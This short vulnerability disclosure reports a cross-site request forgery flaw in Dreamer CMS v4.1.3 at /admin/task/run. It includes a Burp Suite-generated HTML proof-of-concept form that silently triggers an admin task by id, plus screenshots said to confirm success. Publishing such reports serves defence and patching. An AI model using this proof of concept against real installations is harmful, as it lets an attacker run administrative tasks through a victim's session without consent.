Target is https://github.com/iteachyou-wjn/dreamer_cms

version:4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/task/run

![图片](https://github.com/CP1379767017/cms/assets/56637547/804ec3e9-15af-4246-88dc-2614d8fa0ae6)


create poc

![图片](https://github.com/CP1379767017/cms/assets/56637547/534ca0df-ee94-4dd2-9b04-f714faabd1d2)

```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.247.186:8888/admin/task/run">
      <input type="hidden" name="id" value="1721866720087113728" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

```
successed

![图片](https://github.com/CP1379767017/cms/assets/56637547/d16f11ff-a8b3-41da-94e0-a3b1c1fcdf15)
